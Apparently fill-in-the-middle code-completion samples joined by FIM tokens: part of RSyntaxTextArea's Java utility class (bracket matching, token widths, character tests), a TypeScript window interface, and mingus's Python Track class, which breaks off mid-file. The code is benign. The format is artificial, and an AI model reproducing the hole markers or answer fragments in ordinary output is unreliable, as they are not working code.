        return sp.getGutter(); // Should always be non-null
    }
    return null;
}
/**
 * Returns the color to use for hyperlink-style components.  This method
 * will return <code>Color.blue</code> unless it appears that the current
 * LookAndFeel uses light text on a dark background, in which case a
 * brighter alternative is returned.
 *
 * @return The color to use for hyperlinks.
 * @see #isLightForeground(Color)
 */
public static final Color getHyperlinkForeground() {
    // This property is defined by all standard LaFs, even Nimbus (!),
    // but you never know what crazy LaFs there are...
    Color labelForeground = UIManager.getColor("Label.foreground");
    if (labelForeground == null) {
        labelForeground = new JLabel().getForeground();
    }
    boolean lightOnDark = isLightForeground(labelForeground);
    return lightOnDark ? LIGHT_HYPERLINK_FG : Color.blue;
}
/**
 * Returns the leading whitespace of a string.
 *
 * @param text The String to check.
 * @return The leading whitespace.
 * @see #getLeadingWhitespace(Document, int)
 */
public static String getLeadingWhitespace(String text) {
    // Scan forward until the first non-whitespace character.
    int end = 0;
    int len = text.length();
    while (end < len) {
        if (!RSyntaxUtilities.isWhitespace(text.charAt(end))) {
            break;
        }
        end++;
    }
    return text.substring(0, end);
}
/**
 * Returns the leading whitespace of a specific line in a document.
 *
 * @param doc The document.
 * @param offs The offset whose line to get the leading whitespace for.
 * @return The leading whitespace.
 * @throws BadLocationException If <code>offs</code> is not a valid offset
 *         in the document.
 * @see #getLeadingWhitespace(String)
 */
public static String getLeadingWhitespace(Document doc, int offs)
        throws BadLocationException {
    Element root = doc.getDefaultRootElement();
    Element elem = root.getElement(root.getElementIndex(offs));
    int startOffs = elem.getStartOffset();
    // "- 1" excludes the line's trailing newline character.
    int len = elem.getEndOffset() - 1 - startOffs;
    return getLeadingWhitespace(doc.getText(startOffs, len));
}
/**
 * Returns the document {@link Element} for the line containing
 * <code>offs</code>, or <code>null</code> if the offset falls outside
 * that element's range.
 *
 * @param d The document.
 * @param offs The document offset.
 * @return The line element, or <code>null</code>.
 */
private static final Element getLineElem(Document d, int offs) {
    Element root = d.getDefaultRootElement();
    Element elem = root.getElement(root.getElementIndex(offs));
    boolean inRange = offs >= elem.getStartOffset() && offs < elem.getEndOffset();
    return inRange ? elem : null;
}
/**
 * Returns the bounding box (in the current view) of a specified position
 * in the model.  This method is designed for line-wrapped views to use,
 * as it allows you to specify a "starting position" in the line, from
 * which the x-value is assumed to be zero.  The idea is that you specify
 * the first character in a physical line as <code>p0</code>, as this is
 * the character where the x-pixel value is 0.
 *
 * @param textArea The text area containing the text.
 * @param s A segment in which to load the line.  This is passed in so we
 *        don't have to reallocate a new <code>Segment</code> for each
 *        call.
 * @param p0 The starting position in the physical line in the document.
 * @param p1 The position for which to get the bounding box in the view.
 * @param e How to expand tabs.
 * @param rect The rectangle whose x- and width-values are changed to
 *        represent the bounding box of <code>p1</code>.  This is reused
 *        to keep from needlessly reallocating Rectangles.
 * @param x0 The x-coordinate (pixel) marking the left-hand border of the
 *        text.  This is useful if the text area has a border, for example.
 * @return The bounding box in the view of the character <code>p1</code>.
 * @throws BadLocationException If <code>p0</code> or <code>p1</code> is
 *         not a valid location in the specified text area's document.
 * @throws IllegalArgumentException If <code>p0</code> and <code>p1</code>
 *         are not on the same line.
 */
public static Rectangle getLineWidthUpTo(RSyntaxTextArea textArea,
        Segment s, int p0, int p1,
        TabExpander e, Rectangle rect,
        int x0)
        throws BadLocationException {

    RSyntaxDocument doc = (RSyntaxDocument)textArea.getDocument();

    // Ensure p0 and p1 are valid document positions.
    if (p0<0)
        throw new BadLocationException("Invalid document position", p0);
    else if (p1>doc.getLength())
        throw new BadLocationException("Invalid document position", p1);

    // Ensure p0 and p1 are in the same line, and get the start/end
    // offsets for that line.
    Element map = doc.getDefaultRootElement();
    int lineNum = map.getElementIndex(p0);
    // We do ">1" because p1 might be the first position on the next line
    // or the last position on the previous one.
    // if (lineNum!=map.getElementIndex(p1))
    if (Math.abs(lineNum-map.getElementIndex(p1))>1)
        throw new IllegalArgumentException("p0 and p1 are not on the " +
                "same line (" + p0 + ", " + p1 + ").");

    // Get the token list.
    Token t = doc.getTokenListForLine(lineNum);

    // Modify the token list 't' to begin at p0 (but still have correct
    // token types, etc.), and get the x-location (in pixels) of the
    // beginning of this new token list.
    // NOTE(review): uses the shared static tempToken buffer — appears to
    // assume single-threaded (EDT) use; confirm before calling off-thread.
    TokenSubList subList = TokenUtils.getSubTokenList(t, p0, e, textArea,
            0, tempToken);
    t = subList.tokenList;

    rect = t.listOffsetToView(textArea, e, p1, x0, rect);
    return rect;
}
/**
* Returns the location of the bracket paired with the one at the current
* caret position.
*
* @param textArea The text area.
* @param input A point to use as the return value. If this is
* <code>null</code>, a new object is created and returned.
* @return A point representing the matched bracket info. The "x" field
* is the offset of the bracket at the caret position (either just
* before or just after the caret), and the "y" field is the offset
* of the matched bracket. Both "x" and "y" will be
* <code>-1</code> if there isn't a matching bracket (or the caret
* isn't on a bracket).
*/
public static Point getMatchingBracketPosition(RSyntaxTextArea textArea,
Point input) {
if (input==null) {
input = new Point();
}
input.setLocation(-1, -1);
try {
// Actually position just BEFORE caret.
int caretPosition = textArea.getCaretPosition() - 1;
RSyntaxDocument doc = (RSyntaxDocument)textArea.getDocument();
char bracket = 0;
// If the caret was at offset 0, we can't check "to its left."
if (caretPosition>=0) {
bracket = doc.charAt(caretPosition);
}
// Try to match a bracket "to the right" of the caret if one
// was not found on the left.
int index = BRACKETS.indexOf(bracket);
if (index==-1 && caretPosition<doc.getLength()-1) {
bracket = doc.charAt(++caretPosition);
}
// First, see if the char was a bracket (one of "{[()]}").
if (index==-1) {
index = BRACKETS.indexOf(bracket);
if (index==-1) {
return input;
}
}
// If it was, then make sure this bracket isn't sitting in
// the middle of a comment or string. If it isn't, then
// initialize some stuff so we can continue on.
char bracketMatch;
boolean goForward;
Element map = doc.getDefaultRootElement();
int curLine = map.getElementIndex(caretPosition);
Element line = map.getElement(curLine);
int start = line.getStartOffset();
int end = line.getEndOffset();
Token token = doc.getTokenListForLine(curLine);
token = RSyntaxUtilities.getTokenAtOffset(token, caretPosition);
// All brackets are always returned as "separators."
if (token.getType()!=Token.SEPARATOR) {
return input;
}
if (index<3) { // One of "{[("
goForward = true;
bracketMatch = BRACKETS.charAt(index + 3);
}
else { // One of ")]}"
goForward = false;
bracketMatch = BRACKETS.charAt(index - 3);
}
if (goForward) {
int lastLine = map.getElementCount();
// Start just after the found bracket since we're sure
// we're not in a comment.
start = caretPosition + 1;
int numEmbedded = 0;
boolean haveTokenList = false;
while (true) {
doc.getText(start,end-start, charSegment);
int segOffset = charSegment.offset;
for (int i=segOffset; i<segOffset+charSegment.count; i++) {
char ch = charSegment.array[i];
if (ch==bracket) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
token = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (token.getType()==Token.SEPARATOR)
numEmbedded++;
}
else if (ch==bracketMatch) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
token = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (token.getType()==Token.SEPARATOR) {
if (numEmbedded==0) {
if (textArea.isCodeFoldingEnabled() &&
textArea.getFoldManager().isLineHidden(curLine)) {
return input; // Match hidden in a fold
}
input.setLocation(caretPosition, offset);
return input;
}
numEmbedded--;
}
}
} // End of for (int i=segOffset; i<segOffset+charSegment.count; i++).
// Bail out if we've gone through all lines and
// haven't found the match.
if (++curLine==lastLine)
return input;
// Otherwise, go through the next line.
haveTokenList = false;
line = map.getElement(curLine);
start = line.getStartOffset();
end = line.getEndOffset();
} // End of while (true).
} // End of if (goForward).
// Otherwise, we're going backward through the file
// (since we found '}', ')' or ']').
else { // goForward==false
// End just before the found bracket since we're sure
// we're not in a comment.
end = caretPosition;// - 1;
int numEmbedded = 0;
boolean haveTokenList = false;
Token t2;
while (true) {
doc.getText(start,end-start, charSegment);
int segOffset = charSegment.offset;
int iStart = segOffset + charSegment.count - 1;
for (int i=iStart; i>=segOffset; i--) {
char ch = charSegment.array[i];
if (ch==bracket) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
t2 = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (t2.getType()==Token.SEPARATOR)
numEmbedded++;
}
else if (ch==bracketMatch) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
t2 = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (t2.getType()==Token.SEPARATOR) {
if (numEmbedded==0) {
input.setLocation(caretPosition, offset);
return input;
}
numEmbedded--;
}
}
}
// Bail out if we've gone through all lines and
// haven't found the match.
if (--curLine==-1) {
return input;
}
// Otherwise, get ready for going through the
// next line.
haveTokenList = false;
line = map.getElement(curLine);
start = line.getStartOffset();
end = line.getEndOffset();
} // End of while (true).
} // End of else.
} catch (BadLocationException ble) {
// Shouldn't ever happen.
ble.printStackTrace();
}
// Something went wrong...
return input;
}
/**
* Returns the next non-whitespace, non-comment token in a text area.
*
* @param t The next token in this line's token list.
* @param textArea The text area.
* @param line The current line index (the line index of <code>t</code>).
* @return The next non-whitespace, non-comment token, or <code>null</code>
* if there isn't one.
* @see #getPreviousImportantToken(RSyntaxTextArea, int)
*/
public static final Token getNextImportantToken(Token t,
RSyntaxTextArea textArea, int line) {
while (t!=null && t.isPaintable() && t.isCommentOrWhitespace()) {
t = t.getNextToken();
}
if ((t==null || !t.isPaintable()) && line<textArea.getLineCount()-1) {
t = textArea.getTokenListForLine(++line);
return getNextImportantToken(t, textArea, line);
}
return t;
}
/**
* Provides a way to determine the next visually represented model
* location at which one might place a caret.
* Some views may not be visible,
* they might not be in the same order found in the model, or they just
* might not allow access to some of the locations in the model.<p>
*
* NOTE: You should only call this method if the passed-in
* <code>javax.swing.text.View</code> is an instance of
* {@link TokenOrientedView} and <code>javax.swing.text.TabExpander</code>;
* otherwise, a <code>ClassCastException</code> could be thrown.
*
* @param pos the position to convert >= 0
* @param a the allocated region in which to render
* @param direction the direction from the current position that can
* be thought of as the arrow keys typically found on a keyboard.
* This will be one of the following values:
* <ul>
* <li>SwingConstants.WEST
* <li>SwingConstants.EAST
* <li>SwingConstants.NORTH
* <li>SwingConstants.SOUTH
* </ul>
* @return the location within the model that best represents the next
* location visual position
* @exception BadLocationException
* @exception IllegalArgumentException if <code>direction</code>
* doesn't have one of the legal values above
*/
public static int getNextVisualPositionFrom(int pos, Position.Bias b,
Shape a, int direction,
Position.Bias[] biasRet, View view)
throws BadLocationException {
RSyntaxTextArea target = (RSyntaxTextArea)view.getContainer();
biasRet[0] = Position.Bias.Forward;
// Do we want the "next position" above, below, to the left or right?
switch (direction) {
case NORTH:
case SOUTH:
if (pos == -1) {
pos = (direction == NORTH) ?
Math.max(0, view.getEndOffset() - 1) :
view.getStartOffset();
break;
}
Caret c = (target != null) ? target.getCaret() : null;
// YECK! Ideally, the x location from the magic caret
// position would be passed in.
Point mcp;
if (c != null)
mcp = c.getMagicCaretPosition();
else
mcp = null;
int x;
if (mcp == null) {
Rectangle loc = target.modelToView(pos);
x = (loc == null) ? 0 : loc.x;
}
else {
x = mcp.x;
}
if (direction == NORTH)
pos = getPositionAbove(target,pos,x,(TabExpander)view);
else
pos = getPositionBelow(target,pos,x,(TabExpander)view);
break;
case WEST:
if(pos == -1) {
pos = Math.max(0, view.getEndOffset() - 1);
}
else {
pos = Math.max(0, pos - 1);
if (target.isCodeFoldingEnabled()) {
int last = target.getLineOfOffset(pos+1);
int current = target.getLineOfOffset(pos);
if (last!=current) { // If moving up a line...
FoldManager fm = target.getFoldManager();
if (fm.isLineHidden(current)) {
while (--current>0 && fm.isLineHidden(current));
pos = target.getLineEndOffset(current) - 1;
}
}
}
}
break;
case EAST:
if(pos == -1) {
pos = view.getStartOffset();
}
else {
pos = Math.min(pos + 1, view.getDocument().getLength());
if (target.isCodeFoldingEnabled()) {
int last = target.getLineOfOffset(pos-1);
int current = target.getLineOfOffset(pos);
if (last!=current) { // If moving down a line...
FoldManager fm = target.getFoldManager();
if (fm.isLineHidden(current)) {
int lineCount = target.getLineCount();
while (++current<lineCount && fm.isLineHidden(current));
pos = current==lineCount ?
target.getLineEndOffset(last)-1 : // Was the last visible line
target.getLineStartOffset(current);
}
}
}
}
break;
default:
throw new IllegalArgumentException(
"Bad direction: " + direction);
}
return pos;
}
/**
* Determines the position in the model that is closest to the given
* view location in the row above. The component given must have a
* size to compute the result. If the component doesn't have a size
* a value of -1 will be returned.
*
* @param c the editor
* @param offs the offset in the document >= 0
* @param x the X coordinate >= 0
* @return the position >= 0 if the request can be computed, otherwise
* a value of -1 will be returned.
* @exception BadLocationException if the offset is out of range
*/
public static final int getPositionAbove(RSyntaxTextArea c, int offs,
float x, TabExpander e) throws BadLocationException {
TokenOrientedView tov = (TokenOrientedView)e;
Token token = tov.getTokenListForPhysicalLineAbove(offs);
if (token==null)
return -1;
// A line containing only Token.NULL is an empty line.
else if (token.getType()==Token.NULL) {
int line = c.getLineOfOffset(offs); // Sure to be >0 ??
return c.getLineStartOffset(line-1);
}
else {
return token.getListOffset(c, e, 0, x);
}
}
/**
* Determines the position in the model that is closest to the given
* view location in the row below. The component given must have a
* size to compute the result. If the component doesn't have a size
* a value of -1 will be returned.
*
* @param c the editor
* @param offs the offset in the document >= 0
* @param x the X coordinate >= 0
* @return the position >= 0 if the request can be computed, otherwise
* a value of -1 will be returned.
* @exception BadLocationException if the offset is out of range
*/
public static final int getPositionBelow(RSyntaxTextArea c, int offs,
float x, TabExpander e) throws BadLocationException {
TokenOrientedView tov = (TokenOrientedView)e;
Token token = tov.getTokenListForPhysicalLineBelow(offs);
if (token==null)
return -1;
// A line containing only Token.NULL is an empty line.
else if (token.getType()==Token.NULL) {
int line = c.getLineOfOffset(offs); // Sure to be > c.getLineCount()-1 ??
// return c.getLineStartOffset(line+1);
FoldManager fm = c.getFoldManager();
line = fm.getVisibleLineBelow(line);
return c.getLineStartOffset(line);
}
else {
return token.getListOffset(c, e, 0, x);
}
}
/**
* Returns the last non-whitespace, non-comment token, starting with the
* specified line.
*
* @param textArea The text area.
* @param line The line at which to start looking.
* @return The last non-whitespace, non-comment token, or <code>null</code>
* if there isn't one.
* @see #getNextImportantToken(Token, RSyntaxTextArea, int)
*/
public static final Token getPreviousImportantToken(
RSyntaxTextArea textArea, int line){
if (line<0) {
return null;
}
Token t = textArea.getTokenListForLine(line);
if (t!=null) {
t = t.getLastNonCommentNonWhitespaceToken();
if (t!=null) {
return t;
}
}
return getPreviousImportantToken(textArea, line-1);
}
/**
* Returns the token at the specified index, or <code>null</code> if
* the given offset isn't in this token list's range.<br>
* Note that this method does NOT check to see if <code>tokenList</code>
* is null; callers should check for themselves.
*
* @param tokenList The list of tokens in which to search.
* @param offset The offset at which to get the token.
* @return The token at <code>offset</code>, or <code>null</code> if
* none of the tokens are at that offset.
*/
public static final Token getTokenAtOffset(Token tokenList, int offset) {
for (Token t=tokenList; t!=null && t.isPaintable(); t=t.getNextToken()){
if (t.containsPosition(offset))
return t;
}
return null;
}
/**
* Returns the end of the word at the given offset.
*
* @param textArea The text area.
* @param offs The offset into the text area's content.
* @return The end offset of the word.
* @throws BadLocationException If <code>offs</code> is invalid.
* @see #getWordStart(RSyntaxTextArea, int)
*/
public static int getWordEnd(RSyntaxTextArea textArea, int offs)
throws BadLocationException {
Document doc = textArea.getDocument();
int endOffs = textArea.getLineEndOffsetOfCurrentLine();
int lineEnd = Math.min(endOffs, doc.getLength());
if (offs == lineEnd) { // End of the line.
return offs;
}
String s = doc.getText(offs, lineEnd-offs-1);
if (s!=null && s.length()>0) { // Should always be true
int i = 0;
int count = s.length();
char ch = s.charAt(i);
if (Character.isWhitespace(ch)) {
while (i<count && Character.isWhitespace(s.charAt(i++)));
}
else if (Character.isLetterOrDigit(ch)) {
while (i<count && Character.isLetterOrDigit(s.charAt(i++)));
}
else {
i = 2;
}
offs += i - 1;
}
return offs;
}
/**
* Returns the start of the word at the given offset.
*
* @param textArea The text area.
* @param offs The offset into the text area's content.
* @return The start offset of the word.
* @throws BadLocationException If <code>offs</code> is invalid.
* @see #getWordEnd(RSyntaxTextArea, int)
*/
public static int getWordStart(RSyntaxTextArea textArea, int offs)
throws BadLocationException {
Document doc = textArea.getDocument();
Element line = getLineElem(doc, offs);
if (line == null) {
throw new BadLocationException("No word at " + offs, offs);
}
<|fim▁hole|> }
int endOffs = Math.min(offs+1, doc.getLength());
String s = doc.getText(lineStart, endOffs-lineStart);
if(s != null && s.length() > 0) {
int i = s.length() - 1;
char ch = s.charAt(i);
if (Character.isWhitespace(ch)) {
while (i>0 && Character.isWhitespace(s.charAt(i-1))) {
i--;
}
offs = lineStart + i;
}
else if (Character.isLetterOrDigit(ch)) {
while (i>0 && Character.isLetterOrDigit(s.charAt(i-1))) {
i--;
}
offs = lineStart + i;
}
}
return offs;
}
/**
* Determines the width of the given token list taking tabs
* into consideration. This is implemented in a 1.1 style coordinate
* system where ints are used and 72dpi is assumed.<p>
*
* This method also assumes that the passed-in token list begins at
* x-pixel <code>0</code> in the view (for tab purposes).
*
* @param tokenList The tokenList list representing the text.
* @param textArea The text area in which this token list resides.
* @param e The tab expander. This value cannot be <code>null</code>.
* @return The width of the token list, in pixels.
*/
public static final float getTokenListWidth(Token tokenList,
RSyntaxTextArea textArea,
TabExpander e) {
return getTokenListWidth(tokenList, textArea, e, 0);
}
/**
* Determines the width of the given token list taking tabs
* into consideration. This is implemented in a 1.1 style coordinate
* system where ints are used and 72dpi is assumed.<p>
*
* @param tokenList The token list list representing the text.
* @param textArea The text area in which this token list resides.
* @param e The tab expander. This value cannot be <code>null</code>.
* @param x0 The x-pixel coordinate of the start of the token list.
* @return The width of the token list, in pixels.
* @see #getTokenListWidthUpTo
*/
public static final float getTokenListWidth(final Token tokenList,
RSyntaxTextArea textArea,
TabExpander e, float x0) {
float width = x0;
for (Token t=tokenList; t!=null&&t.isPaintable(); t=t.getNextToken()) {
width += t.getWidth(textArea, e, width);
}
return width - x0;
}
/**
* Determines the width of the given token list taking tabs into
* consideration and only up to the given index in the document
* (exclusive).
*
* @param tokenList The token list representing the text.
* @param textArea The text area in which this token list resides.
* @param e The tab expander. This value cannot be <code>null</code>.
* @param x0 The x-pixel coordinate of the start of the token list.
* @param upTo The document position at which you want to stop,
* exclusive. If this position is before the starting position
* of the token list, a width of <code>0</code> will be
* returned; similarly, if this position comes after the entire
* token list, the width of the entire token list is returned.
* @return The width of the token list, in pixels, up to, but not
* including, the character at position <code>upTo</code>.
* @see #getTokenListWidth
*/
public static final float getTokenListWidthUpTo(final Token tokenList,
RSyntaxTextArea textArea, TabExpander e,
float x0, int upTo) {
float width = 0;
for (Token t=tokenList; t!=null&&t.isPaintable(); t=t.getNextToken()) {
if (t.containsPosition(upTo)) {
return width + t.getWidthUpTo(upTo-t.getOffset(), textArea, e,
x0+width);
}
width += t.getWidth(textArea, e, x0+width);
}
return width;
}
/**
* Returns whether or not this character is a "bracket" to be matched by
* such programming languages as C, C++, and Java.
*
* @param ch The character to check.
* @return Whether or not the character is a "bracket" - one of '(', ')',
* '[', ']', '{', and '}'.
*/
public static final boolean isBracket(char ch) {
// We need the first condition as it might be that ch>255, and thus
// not in our table. '}' is the highest-valued char in the bracket
// set.
return ch<='}' && (dataTable[ch]&BRACKET_MASK)>0;
}
/**
* Returns whether or not a character is a digit (0-9).
*
* @param ch The character to check.
* @return Whether or not the character is a digit.
*/
public static final boolean isDigit(char ch) {
// We do it this way as we'd need to do two conditions anyway (first
// to check that ch<255 so it can index into our table, then whether
// that table position has the digit mask).
return ch>='0' && ch<='9';
}
/**
* Returns whether or not this character is a hex character. This method
* accepts both upper- and lower-case letters a-f.
*
* @param ch The character to check.
* @return Whether or not the character is a hex character 0-9, a-f, or
* A-F.
*/
public static final boolean isHexCharacter(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table). 'f' is the highest-valued
// char that is a valid hex character.
return (ch<='f') && (dataTable[ch]&HEX_CHARACTER_MASK)>0;
}
/**
* Returns whether a character is a Java operator. Note that C and C++
* operators are the same as Java operators.
*
* @param ch The character to check.
* @return Whether or not the character is a Java operator.
*/
public static final boolean isJavaOperator(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table). '~' is the highest-valued
// char that is a valid Java operator.
return (ch<='~') && (dataTable[ch]&JAVA_OPERATOR_MASK)>0;
}
/**
* Returns whether a character is a US-ASCII letter (A-Z or a-z).
*
* @param ch The character to check.
* @return Whether or not the character is a US-ASCII letter.
*/
public static final boolean isLetter(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table).
return (ch<='z') && (dataTable[ch]&LETTER_MASK)>0;
}
/**
* Returns whether or not a character is a US-ASCII letter or a digit.
*
* @param ch The character to check.
* @return Whether or not the character is a US-ASCII letter or a digit.
*/
public static final boolean isLetterOrDigit(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table).
return (ch<='z') && (dataTable[ch]&LETTER_OR_DIGIT_MASK)>0;
}
/**
* Returns whether the specified color is "light" to use as a foreground.
* Colors that return <code>true</code> indicate that the current Look and
* Feel probably uses light text colors on a dark background.
*
* @param fg The foreground color.
* @return Whether it is a "light" foreground color.
* @see #getHyperlinkForeground()
*/
public static final boolean isLightForeground(Color fg) {
return fg.getRed()>0xa0 && fg.getGreen()>0xa0 && fg.getBlue()>0xa0;
}
/**
* Returns whether or not a character is a whitespace character (either
* a space ' ' or tab '\t'). This checks for the Unicode character values
* 0x0020 and 0x0009.
*
* @param ch The character to check.
* @return Whether or not the character is a whitespace character.
*/
public static final boolean isWhitespace(char ch) {
// We do it this way as we'd need to do two conditions anyway (first
// to check that ch<255 so it can index into our table, then whether
// that table position has the whitespace mask).
return ch==' ' || ch=='\t';
}
/**
* Returns whether a regular expression token can follow the specified
* token in JavaScript.
*
* @param t The token to check, which may be <code>null</code>.
* @return Whether a regular expression token may follow this one in
* JavaScript.
*/
public static boolean regexCanFollowInJavaScript(Token t) {
char ch;
// We basically try to mimic Eclipse's JS editor's behavior here.
return t==null ||
//t.isOperator() ||
(t.length()==1 && (
(ch=t.charAt(0))=='=' ||
ch=='(' ||
ch==',' ||
ch=='?' ||
ch==':' ||
ch=='[' ||
ch=='!' ||
ch=='&'
)) ||
/* Operators "==", "===", "!=", "!==" */
(t.getType()==Token.OPERATOR &&
t.charAt(t.length()-1)=='=') ||
t.is(Token.RESERVED_WORD_2, JS_KEYWORD_RETURN);
}
/**
* If the character is an upper-case US-ASCII letter, it returns the
* lower-case version of that letter; otherwise, it just returns the
* character.
*
* @param ch The character to lower-case (if it is a US-ASCII upper-case
* character).
* @return The lower-case version of the character.
*/
public static final char toLowerCase(char ch) {
// We can logical OR with 32 because A-Z are 65-90 in the ASCII table
// and none of them have the 6th bit (32) set, and a-z are 97-122 in
// the ASCII table, which is 32 over from A-Z.
// We do it this way as we'd need to do two conditions anyway (first
// to check that ch<255 so it can index into our table, then whether
// that table position has the upper-case mask).
if (ch>='A' && ch<='Z')
return (char)(ch | 0x20);
return ch;
}
/**
* Returns an integer constant representing the OS. This can be handy for
* special case situations such as Mac OS-X (special application
* registration) or Windows (allow mixed case, etc.).
*
* @return An integer constant representing the OS.
*/
public static final int getOS() {
return OS;
}
/**
* Returns an integer constant representing the OS. This can be handy for
* special case situations such as Mac OS-X (special application
* registration) or Windows (allow mixed case, etc.).
*
* @return An integer constant representing the OS.
*/
private static final int getOSImpl() {
int os = OS_OTHER;
String osName = System.getProperty("os.name");
if (osName!=null) { // Should always be true.
osName = osName.toLowerCase();
if (osName.indexOf("windows") > -1)
os = OS_WINDOWS;
else if (osName.indexOf("mac os x") > -1)
os = OS_MAC_OSX;
else if (osName.indexOf("linux") > -1)
os = OS_LINUX;
else
os = OS_OTHER;
}
return os;
}
/**
* Creates a regular expression pattern that matches a "wildcard" pattern.
*
* @param wildcard The wildcard pattern.
* @param matchCase Whether the pattern should be case sensitive.
* @param escapeStartChar Whether to escape a starting <code>'^'</code>
* character.
* @return The pattern.
*/
public static Pattern wildcardToPattern(String wildcard, boolean matchCase,
boolean escapeStartChar) {
int flags = 0;
if (!matchCase) {
flags = Pattern.CASE_INSENSITIVE|Pattern.UNICODE_CASE;
}
StringBuilder sb = new StringBuilder();
for (int i=0; i<wildcard.length(); i++) {
char ch = wildcard.charAt(i);
switch (ch) {
case '*':
sb.append(".*");
break;
case '?':
sb.append('.');
break;
case '^':
if (i>0 || escapeStartChar) {
sb.append('\\');
}
sb.append('^');
break;
case '\\':
case '.': case '|':
case '+': case '-':
case '$':
case '[': case ']':
case '{': case '}':
case '(': case ')':
sb.append('\\').append(ch);
break;
default:
sb.append(ch);
break;
}
}
Pattern p = null;
try {
p = Pattern.compile(sb.toString(), flags);
} catch (PatternSyntaxException pse) {
pse.printStackTrace();
p = Pattern.compile(".+");
}
return p;
}
}<|fim▁end|> | int lineStart = line.getStartOffset();
if (offs==lineStart) { // Start of the line.
return offs;
|
<|file_name|>IWindow.ts<|end_file_name|><|fim▁begin|>"use strict";
/**
* Additional Interfaces
*/
import ILocalStorage from "./ILocalStorage";
/**
* The Window interface
*/
interface IWindow {
atob: any;
btoa: any;
escape: any;
unescape: any;
location: any;
Promise: any;
document: Document;
addEventListener: Function;
removeEventListener: Function;
localStorage: ILocalStorage;
}<|fim▁hole|> * Declare window interface
*/
declare var window: IWindow;
/**
* Export the window interface
*/
export default IWindow;<|fim▁end|> | /** |
<|file_name|>track.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
# mingus - Music theory Python package, track module.
# Copyright (C) 2008-2009, Bart Spaans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from mt_exceptions import InstrumentRangeError
from mingus.containers.note_container import NoteContainer
from mingus.containers.bar import Bar
import mingus.core.value as value
class Track(object):
"""A track object.
The Track class can be used to store Bars and to work on them.
The class is also designed to be used with Instruments, but this is
optional.
Tracks can be stored together in Compositions.
"""
bars = []
instrument = None
name = 'Untitled' # Will be looked for when saving a MIDI file.
tuning = None # Used by tablature
def __init__(self, instrument=None):
self.bars = []
self.instrument = instrument
def add_bar(self, bar):
"""Add a Bar to the current track."""
self.bars.append(bar)
return self
def add_notes(self, note, duration=None):
"""Add a Note, note as string or NoteContainer to the last Bar.
If the Bar is full, a new one will automatically be created.
If the Bar is not full but the note can't fit in, this method will
return False. True otherwise.
An InstrumentRangeError exception will be raised if an Instrument is
attached to the Track, but the note turns out not to be within the
range of the Instrument.
"""
if self.instrument != None:
if not self.instrument.can_play_notes(note):
raise InstrumentRangeError, \
"Note '%s' is not in range of the instrument (%s)" % (note,
self.instrument)
if duration == None:
duration = 4
# Check whether the last bar is full, if so create a new bar and add the
# note there
if len(self.bars) == 0:
self.bars.append(Bar())
last_bar = self.bars[-1]
if last_bar.is_full():
self.bars.append(Bar(last_bar.key, last_bar.meter))
# warning should hold note if it doesn't fit
return self.bars[-1].place_notes(note, duration)
def get_notes(self):
"""Return an iterator that iterates through every bar in the this<|fim▁hole|> for beat, duration, notes in bar:
yield beat, duration, notes
def from_chords(self, chords, duration=1):
"""Add chords to the Track.
The given chords should be a list of shorthand strings or list of
list of shorthand strings, etc.
Each sublist divides the value by 2.
If a tuning is set, chords will be expanded so they have a proper
fingering.
Example:
>>> t = Track().from_chords(['C', ['Am', 'Dm'], 'G7', 'C#'], 1)
"""
tun = self.get_tuning()
def add_chord(chord, duration):
if type(chord) == list:
for c in chord:
add_chord(c, duration * 2)
else:
chord = NoteContainer().from_chord(chord)
if tun:
chord = tun.find_chord_fingering(chord,
return_best_as_NoteContainer=True)
if not self.add_notes(chord, duration):
# This should be the standard behaviour of add_notes
dur = self.bars[-1].value_left()
self.add_notes(chord, dur)
# warning should hold note
self.add_notes(chord, value.subtract(duration, dur))
for c in chords:
if c is not None:
add_chord(c, duration)
else:
self.add_notes(None, duration)
return self
def get_tuning(self):
"""Return a StringTuning object.
If an instrument is set and has a tuning it will be returned.
Otherwise the track's one will be used.
"""
if self.instrument and self.instrument.tuning:
return self.instrument.tuning
return self.tuning
def set_tuning(self, tuning):
"""Set the tuning attribute on both the Track and its instrument (when
available).
Tuning should be a StringTuning or derivative object.
"""
if self.instrument:
self.instrument.tuning = tuning
self.tuning = tuning
return self
def transpose(self, interval, up=True):
"""Transpose all the notes in the track up or down the interval.
Call transpose() on every Bar.
"""
for bar in self.bars:
bar.transpose(interval, up)
return self
def augment(self):
"""Augment all the bars in the Track."""
for bar in self.bars:
bar.augment()
return self
def diminish(self):
"""Diminish all the bars in the Track."""
for bar in self.bars:
bar.diminish()
return self
def __add__(self, value):
"""Enable the '+' operator for Tracks.
Notes, notes as string, NoteContainers and Bars accepted.
"""
if hasattr(value, 'bar'):
return self.add_bar(value)
elif hasattr(value, 'notes'):
return self.add_notes(value)
elif hasattr(value, 'name') or type(value) == str:
return self.add_notes(value)
def test_integrity(self):
"""Test whether all but the last Bars contained in this track are
full."""
for b in self.bars[:-1]:
if not b.is_full():
return False
return True
def __eq__(self, other):
"""Enable the '==' operator for tracks."""
for x in range(0, len(self.bars) - 1):
if self.bars[x] != other.bars[x]:
return False
return True
def __getitem__(self, index):
"""Enable the '[]' notation for Tracks."""
return self.bars[index]
def __setitem__(self, index, value):
